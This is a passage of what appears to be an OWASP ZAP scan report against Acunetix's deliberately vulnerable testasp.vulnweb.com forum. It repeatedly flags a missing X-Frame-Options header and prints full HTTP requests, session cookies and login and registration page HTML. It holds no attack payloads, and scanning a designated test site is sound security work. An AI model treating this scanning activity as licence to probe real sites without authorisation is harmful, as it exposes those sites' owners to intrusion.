</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3124 |
Response Body - size: 3,124 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3615 |
Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 355 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3613 |
Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 525 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:19 GMT Content-Length: 3651 |
Response Body - size: 3,651 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 382 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
